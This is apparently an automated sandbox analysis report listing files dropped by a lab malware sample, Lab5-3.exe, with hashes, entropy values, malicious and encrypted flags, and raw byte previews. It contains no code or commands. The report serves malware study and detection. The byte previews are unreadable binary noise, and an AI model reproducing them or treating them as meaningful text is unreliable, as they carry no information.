                                                                                                          SHA-256:3F8404B69387416E35C55421A5967DDEEE086592870FC05662BF6B195CABBB03
                                                                                                          SHA-512:3BFF775D15104AA39144E4A10B63B0853A2DF9D51511A6E7BF49D816D99AC38C52FE48176E1F2BA5097BC0207E1AC248FD4DB8631F69180DF984B629027D802B
                                                                                                          Malicious:true
                                                                                                          Preview:O#.$.'.K.w....D0dM..........!(._.D..C.{i"...i.n.,}.R.....O....BB..i.!a.A..q...9.?....OZj.WF.0......{.uJ..Jx7$<......b.Nc..?..`......Y......#}).V.d..q.......n.6...[......^.|4...p..w.hd..WB...[.........t..4......CX+7FFPw_.a...F..k*.z.d..P.3..u.Z.a....yI\....|..!..v.{..IH.....\....Hk...d.Sn.1v\c.=...t....t.}>54.!...nf.uT....!UX.....Z.J..t..,...H..].....?..3.7.<Aj..H.#....9.....U.<3|....OTz.....[QBg.:+.....uU...d..;qLL..%..T....{.&.zY.$.N-...aG.!M2z..p .RK).W....?.\...&.^NW....(eG.;....vR.C.....S..7#....S.[...ID-rd.b1.....p}.X.....%..X......U.~......%.Hh}.A....v..........inw..[...O..a#K0....B!.$i.fD..Cw].........o....S......g-8...=..@....KeX. .Y...$?.z..K..k.>)4 .O..p_^.V.S3...s.p@B....K.s..#.f..bZ.+...H.+4.;...0.VE.).........R...Yg.D.t2..s....t...5....O..<.*......%...X..,....!...dM..Z,#.".L.....q.;+.....x..8Q.l5d.e./....w.7...K.&w.$(y..y.....U.R......6..o3:....,....sZ........7..l......f..q.|.R............Dv....w.j............%.8./...3..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):24912
                                                                                                          Entropy (8bit):7.992009178147899
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:EAjaFhmKwOSSVXjQwPN7rZ6AR9buxLIIO4oZ:EmaFhmKwSV7JROLIIoZ
                                                                                                          MD5:56175D04D9B28A8E62927DD199581CE2
                                                                                                          SHA1:226CFAF7757F65433C88AA13E73F43698D9D2C25
                                                                                                          SHA-256:8ED0E9855E7B9B1CEBB561CCCC6C78A6066FE57FDED67AEA08588327724F2A50
                                                                                                          SHA-512:614380DFCBD034395E6DC7F699A109748A76D228D850E061D1A88FA88788B2AE5837A5CC9836BC75D8F09D2222EAECB2183D525E052DCDDB5900B7EF39F6A8DE
                                                                                                          Malicious:true
                                                                                                          Preview:.Xi?!.....R....=.j.sB..G$...qE...7._....9..J)..q...40vw2^u#...C.X....;...l...x.U...(p[p@..-nV<.y...u....GV+=....6...zf.}.z..5.*Z.K....*j..R......C....6..K.0X...."A.. ..0..!......O..*'!...U.:.3...s...Pr....8.ja?&G.9.Y..(.....1}{J.>?...U&Xf.-.E:r..e#.....cg...a..wR........*..-......~4.0..S.Q2u.@.\j..e.|..^.xy.V........1../@.'..........W.4>4r...T.sA..)1.a...R......f....`...I.}A..+.-....__m....u........p..2.`=m.5S.tq.f.+F:>.8...R.t5..{....ZC...D,.\...VGX.c..2l........@. KZ.N..).'.g..r.r6@a(......O...NZomcV.&...w.$.4.u.\...J..2.....;2p......cu.....,Go......yw`.k.%....n.....+.p....X.8.......PuGY{..,N...$."@=.Q..|...._..E.DM#..V-xXn....P.;...%.#e...)f.#VMVR...3..9..AA).Q.<X.<....n.F0..h..Y..k........5....f^..B.....K.lmC.8.<x]=.).......\.._..0<.~38SxGw.q,E6..\.@A..;.UD.F..O.R"...A....q.T.......@9.....4...s.Zw....8.i.H`s.l......N.9...;...*.#<^.....e...H...1.k..>c.......26n+.s.l.m...Fz.1W.W3.-aE...r..}..g.l....z.......u....,J.^.ei6..b.d.X...&..|<e.T.r#
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):25552
                                                                                                          Entropy (8bit):7.993516536440377
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:i14yFMh6UrdE2mp4JZIaRrjH+23SM9dfLVZ:SF90g4fIqrje2iM9dfZZ
                                                                                                          MD5:E54F37F02862A77C1AF6E2A8FC30A5C5
                                                                                                          SHA1:6025F1018C91F9F70854BDFBDFD8F0FB7DA4FABC
                                                                                                          SHA-256:4042AF870F1D87E5ED3E0442AA3A5768B6878EDBC8C8778647A33A1702E5B348
                                                                                                          SHA-512:FA4701B76AF0511EA857FFE526096483344A0F350BE7C0439246CC4C5BF017EC965AA4D75043D152AB236854DF4BDF61FA59B95C30DA4127D727D3A1ECE57470
                                                                                                          Malicious:true
                                                                                                          Preview:.Z.OquPP.*/D-.J%..Y_.U....u..W.O|Kv.....8.......).3.#......k....7W.).......K....>Mw...f_....#!j..r\..&..v<s.c..L..+..!A.t.N....KM\........3L..)..W...+|.T.*Z...... ..#.6.>}.!...D..hQZw!..N.h..n.B..>I...`..<.t.S....R.(.i..q_B..d.g}s...N^}w....Q-l7H4....a....?&.x.x..M.{..;Q.|<00]%.4..)..>..8e...p.Udz.<G....5.Q.5...S...u..=.1.0.DzW`.].c!X....Q..."...b.:K.kj.,.$..7.K. .......I.....Z.?5P...X.......0L...K.4.Km..U..#.*..v.(.a..{..-.l...pV.,!..k.+%..[S..F..#.p...."7..3..e..C$......[.u..6...%_..*l.k.|{.^...]-.....H:.......i........Q..........D1$.#;m#sF.....x..C[.'`..`.q}.....k.qPd.b..U.g4*..w,..l.;.#..|-....{......3c...W7..|..B6..*...a.0oAv...j.X.wI..;.* A.)...Y.P..(....1..3r'hr..' ..........q...PZ.Y.t.Sx.Rn..g.Z.0Q..+.2.....6:.8..u.. .X....i....x...Y.f35..>J...J....N.h.`..L..O6}+..;.....g_.y.9...v*Xz..@....]....m.W.#e..R6.k..$)s/6...<.,;"..9..t.&..>.......=.qG...o.O...<......a..G..L.....5..$^...1{...W1"......f..pN.#_.(|8..|#q....$sP.:.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20000
                                                                                                          Entropy (8bit):7.990755429270241
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:GpffJ9JcjjirgXUFzLVa13MDA9N5rFOUGjot6H6R5tb:GRfJWjirgEZVa1cDsrOUOOn/Z
                                                                                                          MD5:E040D0BCB5EAC8373A14413AC06BD06A
                                                                                                          SHA1:E6953BBA31708B407BC556AB2F81EF42BDAD7FE2
                                                                                                          SHA-256:DC148096CE1E1CB58C0CD922157645F09D7BC600A55EEDEFFBAD04D819C00FBC
                                                                                                          SHA-512:1E6EFEB1429CE11FE9B7675F17F23CC6B4B1F97CFF39580D47FB96AA04FB00C6206797D32EEFB190638AE756F01BEDE765119FA3A811AF63F13E2E47630F2E46
                                                                                                          Malicious:true
                                                                                                          Preview:.;..e..Eg...@#I...7GZ.,T...b,.9....]Z#0V....l!.[.|1..S..Eb9-..].&$:.....x.h..... .|.Q=...2..].....Cu.Y...T...{7%..i.....w3.g......H._E....M...L.....^....eo..{.|.8..*Rk./]V..p.x.I..u..P 6.......b..O..b..<..z.s3:%.gLP.g.+..F4..d....c.......G.vf.xE.tf.d....S.v%.n.-|..M...i.....B..gk7...+..c...'.8..t9.O..U.M.o......P.a.....hYKGH.U.5.pg.....D...`...k.#3.H.".0....+.s\........S3....a...)c..)I..0.-.UZ..D.TW.....7.....'...:..A^n.(.y.E.>#.\K....9W..}.u..a`d.........s....1DJ..\.A...5|3.._...t. .S..I..a..'..s...5q...t.#oM......b.eb..`..X.nS.B.r\...u...aQ.1.m.hH...z.mG.)`.u......_..{...../...x6.1..T#D...~.!....H.s...A......c.Y..<...[j.Ps...Eh..1".."........>m..G$..>..]W....'`.m.r....zzL.9...;fJ.L..0<.r_.y.Z.......N;I7n.Y.s.2Z.7"..T........tuo.[..@MN..'...X.....d.f......L...>.qU=.&..N..e....-...m.!.....I....N........=a.Q..;;&.......+wL/....@>c.%$.C...s..5_0m....q.H...".a}9.A.y.^:wtM..Ak.....b.j..P....W.j.}.X.QZ..3J.$Q..Oun..(_...^DTn%.. ......2j..pX[H
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28240
                                                                                                          Entropy (8bit):7.993812984041051
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:bYCjwrGXkNxY3mb0yKqvB18r6Pos/sLaT7A5RZ:Hjw0k7QmbHKqvHofg7A5RZ
                                                                                                          MD5:02F09753EF0CD4203600DB7D140A78AB
                                                                                                          SHA1:11CFA7C94D55A4408F63BD4E15F05059665C1C98
                                                                                                          SHA-256:2037140F197E9918CB6AB0F6B5F187596C0502521AB71F3671524A86B3C02F65
                                                                                                          SHA-512:9082D1914A4DF5BE2CB64B8BF92DAABAD6CBF93325D3FCF846174613706333D5B11FC33294FBA39E5F57CACB69751EC2C90163068F79FF0F358BDAA27EE4DFD9
                                                                                                          Malicious:true
                                                                                                          Preview:./lA..9MD.....(......'.........F..Q....5....l...!Q.K).......A.DQ._.r.........g..........u}..*.?..ga....Z!".a`c.t...g.....q=.q..&.....,%)...........(....y.._.]..>...3.X.W..g.,..-..H(]].y.l.Hf.}H........gtk..~...b..Rb.r....V..(y...*..Y)..g..}.......z....=!..3...d8o..#Z..~.z^.`a'..(.*.9.~GF.Z.$.v........n.n.....Gi.r..D....4.1x.P',..#Pmh ..&'..;.Q..!p....'<o.lA.$THIx.fQ.^z.c..t..[._..t.....x...,SI/..../K.....+\.z..G.F[..ZC4.......-8.....T...\...Q&.Y.R.f....K...o.F....q..}...{...Q..Z..F-.o..0.\..5.*. ..Y........o.$...@.or.......C>_.u..@q#!.QV`ND }.2Z.Q.....Y...M..s..k...J..m..X......4....,..3#.v"...v .....K.A.$E..{.M*...M4>... s...o.R.T...*.E.[....Mo..u=d...|h.....[.q....4|.L..^...b....._..>y2..y.....6.X)t.......?1.....W.7..cn.E.lT..U...4EDi.....bJ.....?.k.+...l....sg.......D./P.q......5...._.W......@.x5|.e?U.......f..w..I..Q...q)...|.p=.[6J.S{. .....0..PW!.9....&...y+.@.....W.+.Z....:.[c..@>R<..n..au.Tsr[2B:?..w%;f../9.4U..e..i.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21648
                                                                                                          Entropy (8bit):7.991698011889137
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:HV4//HMewK5YGAxcaB4Dv3eJemVX1np5r6yRwHBq6/Ltb:K/6K5YGnaBItmVT5ucwo6/LZ
                                                                                                          MD5:846D7A48B4B8AFBFA4D342964E4053DD
                                                                                                          SHA1:F25DA184C722C9F47B9E17C2D5D83D04777E132B
                                                                                                          SHA-256:F2B468BEE106967F3FE23D572354D2ED68E72416C9D6CCC9EE7F9469E4EB5522
                                                                                                          SHA-512:9B7E4AA1FC7E5F08F24D9B456137657C3DA55DE297E4530FBAD9E7EB6905DC85E16818AEE3FEE83D1A5627FC78F66B96AB17DD48DAE377A9B48FDF04ED956A2B
                                                                                                          Malicious:true
                                                                                                          Preview:bV..\....:....4..+.\.H.i...%.....9....X.V..D.3..(.......F...I..c......D.q..4..u.=.I.U....].P..{....O.UhG.?Jz....1=.=.....f....&..|E....X|.$.$)...t..K.wlP5...[.l....Z#\...Y......M.'....Z.!......M..!k...p.:R......u'.KG..=.... ..=.n....S..H.2...B.m.....dk......l"w`c.Bo(..T.......!aX{.......W.^*[...V_.'@.......O.....<i.Z}..$.i4..L..n;.X.......l...D.,.ro2.....:.f`rm...l.T.d.i..\Z..&....cxD..p.d>.wIj!......2.W#.w........`.,.S.g..}.r........&.f..r:.+.l...jJW.~`@.....T...zp.o.F...t..z.K.W....0.....Z._.I...J...!. ...[.m.6.@..x....H....3..f.,.b.u9...Y..tGC=A>\..}k.."]ZW>.a.].?..0.<-<...Q...QRV...5Ki6a.)...c.`.....e.{)y.2..b.y....ey........O._.....N...?..\Z....w..E.Y.I.gR.Bg9....#+f.{.+.I.'..]..,..5.B.m5[....|.a.A+3L.W.Q...Rd.W.}..o.s...g?F..........e.O.l...........MLe..v..l$k.&~..t+....=.."....0j.....T.%..E7...T1_..+L@.W....ae....%).xZ7.....t.-$..>9...##-|..~.....%>....m.........T.P..J=.x...w..&:D/....ZX..A....Bz.fN...I....a...t..Y.B.f..2X..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):19264
                                                                                                          Entropy (8bit):7.9895230791176015
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:a2k80PkEDBQ9ftLDt5mB+EFCxYWDxa2A4cyI/IpPL5la6qtb:a2kgABQ9fJtIB+dxYIxa2A4c/QBLEZ
                                                                                                          MD5:F72FF25426A98F24E705D13117C2C415
                                                                                                          SHA1:1DAD9628A0217F4DDB094AEE054AF454D7C48B9D
                                                                                                          SHA-256:D8FD0D3120DF07EDDCAEA5A9C33B54A282C594A65AAE311087FCD5BD3DB57AF4
                                                                                                          SHA-512:109C9FB86DFAC0511BCA7AE88C6805A1272D394D3183F12D0E6CC11E2681C479B241691D6452B8EB0ED435545E017A863418C3DBC532E4AB646CA0DB937BE1FA
                                                                                                          Malicious:false
                                                                                                          Preview:.~K.....KB..3O....9@.....q.n...bj...T.......xQ...Mge=/.....{.R..].7d|-;^..F..}9.Y.].0.....L+.()<......S.D....k..G..pv...l..x..0.6f.?...~..F.T...6.o.V......4v...+.....Dq.....D#.?...c.~...n--..^..z.=..0P...S_.m!^..+~..H..)y.q......jBN....%D....+...k.......@....Ub....e....,..b..$..M7....TcD.0j..../L...e.$.B....DHU..{..1...Z..~........@S.....vF. 5,....t...l.du.....\X..r.6.;U......O..<...K.]..+.o.....`.v.^X.D...i(....<..L..V..h..R...+s....`a.}1T..[.8eq...m.....q).zC....?.-%..<...)......14p..w....g.`"9.6.I....+.#_M.;.o{J.%.._.|2..U..iz..39..:O..)....E..{.YC...7."Uma.!.[n.0nl.i...:{N. .Xf.P-~.LX...[P>W...#..)&(jx9_.g. =M.t...A|.;...a.u...C..... F.{.B..(....r....-..l"...#;{.6.......'...a.7``.L...]....w4.4.S.5...^.k.....0jIw....W.l.an.8H...G...j.A...........c....xv>/.x..K..k....e...*...pHGkj......dT+.z..9.W%$R.L.RU.v.B......}+...$.....lw7.........W.[....p.Y..dM..@|m2)..Q....ts,F<..........q..T..Z...]bG..)H..,.7.....,E.SW`.#.k\f.s/..%[
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):19152
                                                                                                          Entropy (8bit):7.989334232670225
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:32027J44S02f6WRAz9c3A6T/n+H7otdVwtGpAeNtb:3I7a4S02imf9t7wtGp/Z
                                                                                                          MD5:591FA70B514B5BDEA976F05E0B7B8491
                                                                                                          SHA1:7DBCE070B13FAD4DA2D008ACF4271379A6479F73
                                                                                                          SHA-256:70E0CB046AE2B2927C79BC6524B873CAD7822F6FBF5F57B253B4E650DA19A404
                                                                                                          SHA-512:636B13100A1667867C011FD769DE4ADF117C5053F61A82B0DB0F6D638DA821B5DDF96CD0B49CA775E8EB5E54C46370510BC64C5309CB179B452F1074AB9B4B10
                                                                                                          Malicious:false
                                                                                                          Preview:Q"....*.a..J5..~."1.N.....?.!...R.'..... ..".0u.G..b..A..n.r$.0...R....w....H.....q.4.%.Y..&....P..}T.G4...C../N.....S.u..Aq.......LB....w...J.@.x.`#..;....R.q...v.k+R_bq{..uI]...A..PEc...{..m..3.W.T...F...p..BHA.;......C.....-...A..#......P}IT.N..cvP..3\^..nD...e..O.A.!....zr)..@....v?C.&....`X.J...^q?&..(.g.7.o+..e.8<.,X.<v.v.GZ2....z.....>..a675..L....e....).EM..j4b......."....<5..".+..a...j ....#.#......,[W.N.p...p.".~.vZ..r..%...r[.....eJ..8.w*....K.5..>M.....}...P)yR.^w8(V.y%..e7k..W %.7...4.N-H"..~&..4..7.'.C>...V.-......S..`L{.jsP.M..#....'.. b.%...#.t8.n.(....S...M....0.n.:Y..........9..2,~.>...........z.d.M..p.nD.....dH'R..(.]..E..M...w|.......[ .wG.Va>B....]..3..8..........OOk.{i.LG...)Q...sm....0..b.4.Q.1.......E..e...GSN....X..f.e.O......pe..#..G.....X.:...#>m.hJN,H...CD<.R.. Z.hN..n....[....8.3.|T..P`0...J..l...p...'..J......nlM5P0=..Z.z.$......J.U....L...z....{&...q.......]..P....lH.AH.T(..3....-.ae......VL....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):22160
                                                                                                          Entropy (8bit):7.992933296674472
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:nsnOZ8mIIEp8WzO9wKm6s/dOUWesf3sX/zqF//JhMWc5/ghIvahKeXtb:snOZVEK9wKm3/dOFehWFfs5IphNZ
                                                                                                          MD5:CC15C8A0EB7A5A576D4D3BC7F6153981
                                                                                                          SHA1:099CBAD0B7B5AFF9029FD3981D69A4D3359044B9
                                                                                                          SHA-256:F1270340C6D282F4F1687246847881E7705E06F548BECD549935DD01DB169156
                                                                                                          SHA-512:C842B1E10FEE8D6D82C976DDE19F11172701235BDEEF5731D519CAE0185FD99BF67DD24EB3CCB40C17461060A0FC9435807910B465A26BF7575EC543A6A2EF63
                                                                                                          Malicious:true
                                                                                                          Preview:..5.....p..`...eQ!.\....`b.}.4........t..O..H.K.jk.v.:K~u..-..C....&s.wY.[..{.B..g;..#?.%`.}h.7..)....u..I..cO...M......]......~J.._,"Z...r%$.%ck.....?....S.....3.|*..\...%/c.....G.#..c..48..jQ.0...a.N....Tv...{............K)......M...^e..;..vi.<l@....q.9..I.=~I8..=.J.I..w.].........}..[~.:...).....,PX?.D.eU..U:.GIF.3.X.G.3t..}...[w.BO..5/..^..w./.,.,.[..g..].oG...@.{....3.x...D.=x...]UD.<...F ..N.5......?%.0.m..#}....EH.8....Iu.....B.K..D.)<d#........./..vg...8.......=..s.p....:n.a7...r...m.F..B.....^.C..P.k...v]..<...+.8.....`....a.j*.n..Sd.)......CS..&.T..&.x1O..ld..d...|.$...1...7.t.PbDl...v.H....K.4PH.....}_...V..3.@K.Y.p.y'....d.r0.A....".|.o#...YB^vW9...:.....$lj.y....k.vX.#Z.......|..}r..`.i.[.m...p.N...k.....\6.Q....bJ.b..B.4...M.O.....Fr....1P...>j.......3=... ....P.........X.;.a..yt.G.~A-..(.j`j9v|.....B.Xn.......Yi.~PY.o.'...V..X..m....p.&A.....BQ........9..C..E...*.6.daZ.....O.8./..?,....Y\.....wK`.E/g...x.|.&8.e.n......_..h
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):24176
                                                                                                          Entropy (8bit):7.9918474583923995
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:PS1iqj/7RDIE0KZ9icc4TV7+ERTN3mQGxhOKdoO703LcugVYvKtb:6z/NWAbc4xJBN3tGmao0lySZ
                                                                                                          MD5:D76F07787520A62D78777F669CECCF8E
                                                                                                          SHA1:33B3B99225A62FE879056B8BE0075819C2CEFD9A
                                                                                                          SHA-256:0086B01DA158C59803830DD2E8A1EB32483A220C27481185D99D43DC26859D5D
                                                                                                          SHA-512:6FCA1CEECC003B5917DBA5C97D558FC045B4AA7FDE16C604310FC670A0B6056F4046458923C9F2D3DE3F9C0633FBAED9DBFC5557B71950586739152A45BE0D64
                                                                                                          Malicious:true
                                                                                                          Preview:3y.h...f.G...Y.........5..?^m..d...H.w,..1....g......4...P.T.........-.u.Z.}!.\...o}....)..R.....)..}.........xP...D..+rc^.L.........5x.#....Y:L..L]}.K_...E.M.D.lm...P.`.w\./ &/.Si.3Wc5..(......c...l!..,.....L$,.;r..*..%.a.%.....t...4.9-.24~...29X..U...9^.)uuz.....D..c.._..).53.Q.[...IH.......n..U..}V!.......U.0..8O.Vm0/.....M....U..[*mx........LF....BzhY6.#...q.hg\..s.=..$S.}..=...@k.[..r...........E:..v..z:ZE..`.wa:.-(..B.b_MG..E.x}.5.O}g.-E.r.A..W...E...3l...W...+...$p.Zs.S.Tp.h..7 .....F.F...g....`;..LF.'..BGecj.p.C..i.N.......Ee..........t{....+2.Az.q.w4........k.U.._.J..&..9....k.?....r.....2...`.*9#P$r.7....P..f.....v..z...4Q...:%....Y,..ipg.p;.6.!O_......E..K(7..y.n,..Wt..c.........<>..7n..H.eNr.,......{..........Z.I...Sv,j......y.....Dj.?..............h..\..1=.!.....P...\e }.....'S=..)...rn.7Zx|.f.?<.{.....#:n...!..l/.%..;..yF..~@.[<.h....e.DO.iRjN{..0NmW.C......._^..{.^......*........>x.D...a.F...28.l.%...N.Cun......:..$......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20224
                                                                                                          Entropy (8bit):7.989493343637351
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:GLZxt91QMOK1JTCBTfe1cuMpVZsdA0t1Mn8qDquVKS4pWDEhcGtb:Gbt4dmJTGTqBHPtahJIS49hcGZ
                                                                                                          MD5:D803DC33728C85CC5BD86542F072FEDB
                                                                                                          SHA1:BB51617581B05FEFAAEFF6A7F40126A419F6E57D
                                                                                                          SHA-256:A2CE6B5441C0A7495CC53959311F7F33E205AEA9EF956F74B72F9D94CA3E6DE9
                                                                                                          SHA-512:4F5A9270201B1B9A53EA92212C3723B24AF67585D4118D7E790EB9242075D1CB52CD26417F76F09558B80EC7B8F262D2D6D592FC019D2CCDD9544660FC32F600
                                                                                                          Malicious:false
                                                                                                          Preview:.._...T`'.3.-.T...*.U...UQ..?t>Gf+..oW..s.L<../......\7Y.l&.F.G\.h]:...5.HT.&+h.1..X.6.|`.`K?.nEL..F..#./C!260y5...+.....B...#.;.E...-..BTWh...o.3.O..6..T.W...<;.........l....Mi.~.Y.$7-.5.....%B.s..b....M#.....01jE.P..7.q.. ..V..?.(.v....C.......k.,.j.R&......b....xW^m...S;..,.>c.....L.:.N/../Ks~.K......#..T....O.8J.....l..N8#...."...\.:\B.J'nD..q.gV.}..|..*...=....O.i....}...~....#V[..{.c.&.....K....."..8.b...b....u9.=....5.wb.....D.....TE,f.H.r\..4u.?...z..k....m.wo.p...:....'..0......_..K.......j."O.d......F...e.Q\iH.dz.=.>.B.._D.c.j...>:0.t.r2..P.= 2.g..W....bC .y./....:.....d..@.$q....hR?.....T.D...Wp|0...&.....!.q.+.3T....G.oo......0iA....WZ|.+.%..-.>.."W.nQ..VIp.i.;3mgb..'x....W^.....b`.1P.>..c.d>..x.....M.....-....h>....P6*.(.....'..... .:......vm ....e...[..........T`.s....h%.=.uE......EK..h^...@%L.UMcs>....H.u.N..l4.Ef...4..lX..f...#....0..`.X..'7xj..d..L.S..".OL..E.....P.b@.q..............6NO.M.d.|..T........5.q..#k=>..q6...8?j......h
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20688
                                                                                                          Entropy (8bit):7.990130286225374
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:M1zlaUgu0knegjtzmd7wIszcFWDIPq9MunaeX+L3WLc+WKhlr+mtb:M1+aI97v9PZIsWLvWW+mZ
                                                                                                          MD5:B7B3BDF901F79F227D51796E71A35848
                                                                                                          SHA1:1CDA4FF352BFCA4A790B4E779241EDB3C9713E52
                                                                                                          SHA-256:97AAE6F5434D51055478A433CFE59D880AD17665118C3787773215F045D9CB1F
                                                                                                          SHA-512:C7030C9B75C2D3DD4CDA2BACF48BCCA880A416557BCDC1F1162C271F4E7162F88840F65932C43FD71A2E7C98C1CECE94782A02AA069C1E568FD2DC4332326065
                                                                                                          Malicious:true
                                                                                                          Preview:..j]p.F.%..g.Hs...;.<^ rep..i...[G...k...9y...&:..P.i{........8I..}.........o5.....f.e..D....._8..........'.......dW9.`...A..Or...I.y.i|c..!.5l.5..O.@..s=..|.!...K.(r...|..%...}...VY'..=...2.c...aU.y..?..I.tO63....%0..k......7...Xm.p.@.xQ.26.......`W...g.D..Y0.C].+.N.b.X](.......x...K...$...w..e.<....2." .)...K;..7..V2..0r$...w.a.%....ML'/....7c..~d]U%..<.s...?.Z.....z.%M.e}!.Fv.. V.......s.r.D...+t.......k.S..0.DNPF<[...r.2..o?K.AYLT=.XV2.sx%k.%5w.-{.l?}....4J..f....V..7........)?.....n>Jk....].+..'o.y....bg......:.M..yV8.).v.....^.F.$3A..X9.e......t....~..4!....e<8.n...a..G..i.9.h.%%5.h+..\.... ..0:.Y.ef2........D....."..#MP......\..iS|..b.."...z.;.t.....t.|z`.C.3ET.O&z...AC.KF.......x......L...<...F.n..e.8/..P.J..T.cZ'.6...j...`..]+6.....cP.9...S..9..........&).?...#....|......K.*p.$....z..........>fi.f..8...)..v.{.U..P...+......B~r.2.7..Y...|7.{(.H.L........b.0..6..+k.....<.f`..B.a'..>..."L..4.u....v..../.B........x..W.7l.;>|_p.4wC
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):25184
                                                                                                          Entropy (8bit):7.992504667384741
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:ciezkXF9hdg1X/wri9PJg/m7w6z3tSzXSnTZ:CIXVSl/pPJg/8waMXSTZ
                                                                                                          MD5:90FF219AC1FA029952F1C42D6B91FA75
                                                                                                          SHA1:4F660843398BC1FA6C24FE3164B8B7233206C493
                                                                                                          SHA-256:6A733A904100227E30624827816E9000861376E8FF2E6B8E4D9EB92C00B1FE7A
                                                                                                          SHA-512:A53E6D4E8B3EA82F4433C619969AFA9EA425F16791DCB2C3291712697A480837589C4D363549365DA40600E65CEB938F90A6DC10E4E72EA21C925EEC64C5012A
                                                                                                          Malicious:true
                                                                                                          Preview:<..C..9..<....so.....OQ..Z....hr\oC.V.7]!.t.rZ./.C.H...r..N..O2tK...J.....X.....3..5...F.J.U.|.?.A^[:...J7...... .....y..8hi...R6..F=.....?Hw._%.l.M...Z3D.....^.V.............9..x.*.hS...g.o...tFH........%.S.H..B@....n..U..i_.n._...@m.dT......`.D.....d..Z..f.........Q.~.%..(=X./.....E...........'...[....\....bxh.4b=..g.~.g.....O7.UI. =.k.7<.I....X.~S_W....Be0.u`".?.f..V'=. ...k./'.I.w.....2s.xZ...qt.z...<.5V1.'.o..j>..V...3 .....h....9......H..Q..%..2t.............)x....W60...b..q............9..r.......3m..-"....(.s.>...]G..0^u.H..3...,..Y.v.ean.5$.Z.7.....4...*.v.....:.A.......' ./.@.q...<..s>o....J<5..f...B.'....(.8<Y.4..^....)L.i...n.l.)...}...o.k..M.g3|...a..-.g.bL. ..7Q.`..Y...<i.......=....a..4."!........W.[L....ys.m.)..{......{0"4...5e.|.zG@.{w2>,{k.$..9......5.C..7.r...#...#......m......NwJG.r..*...N...=.....,..{.k..`.3...'..Z3r.J....q.@t..c+..N..../.[2P.|.b...........p..-(...;kx.{.d8."..Q.:...;....%..+ZoFc3.M..x..3..-.s\.~
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):19040
                                                                                                          Entropy (8bit):7.989685468330943
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:spByF2/srJ3wfxabtVVTJWFPCSSY1DIWHbD/GeF0VOH0v0F5JLrEtb:N2kRaaBj9WNCSSuDRNm0XJLgZ
                                                                                                          MD5:BBD1A394B5FF4541EC91431C98D60E59
                                                                                                          SHA1:C02431F6806BD1A4C70C26AA2C34C241EB53F760
                                                                                                          SHA-256:2E94D53DB05FC1DD503F90DBAF432B59144EC153E9902303FF3599E3B8A1C878
                                                                                                          SHA-512:45903E1E884452FEA9C5831FCC6FFACFBB48FAEF236C27E9F0320F263D692E24EC3F13D15D14FC68F3F3C3661D626741D9D103ADF0FB553F39BDFEDC5E0AD94F
                                                                                                          Malicious:false
                                                                                                          Preview:..U..|5.m..i..'..\.*.n...GQu..PL;....m.@./..4}.....%....-(.l...n.u.."_..^4V..x@DE...@..s,..*xl.2..:L........+....\r.....c..1"...../..vx.=.(.L.`.m...Sq..;.za;.<.Q.....kW4....*1.y.<p.\.E..lN...6.~wrm..I...j@..q.PZ.N..}...Y..VY....9..D.W...h.2hI...u3_..5.O.....!.L... 1.g...I...g;.|.`m._.Ui.."-.4..)......".H.>.]...._..W..z:..K...>.I6..l..p.*.L.;.:....1<.l.B....k...fOYA`..5a&.......Xa.y`i.O.5dx.......KJ...sr...M.,.QMg.~K)]^j...X.o.....L.....CW..I..g/.;.~....3..Se...t.&3h'7.Q...J..V..NK.g.R..r.RE....Kr.....d...3Lkr.D...,.}.....*O`.W.Uu.0.M.t........jWM.]#sl.%C..,...+a.sqirBL.pwO.Q.DA.mk...O...i....Jr^T....!..)@L.`.ki.....F%.c....mBz,g...+....!...~.k.cs..~psi:k..]|.~a.rGP".T..o.!|.b.U..A......b.L...."b....M.....P1k.@.P;{...,.;a% ..........x..^ ._.t).....y..WM.u.R.._....Rms.....Tv..9.j....~...K3...V.(@k.ri.\.....I<.R....'.S..@..n*..[.\..-i,.'W...QH......o......%..^U..-S.q...?..N.;.%$#..;u.L$...Hm../..7...2B.R..p......T...O.i3R..YU.A......{,....$7~
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
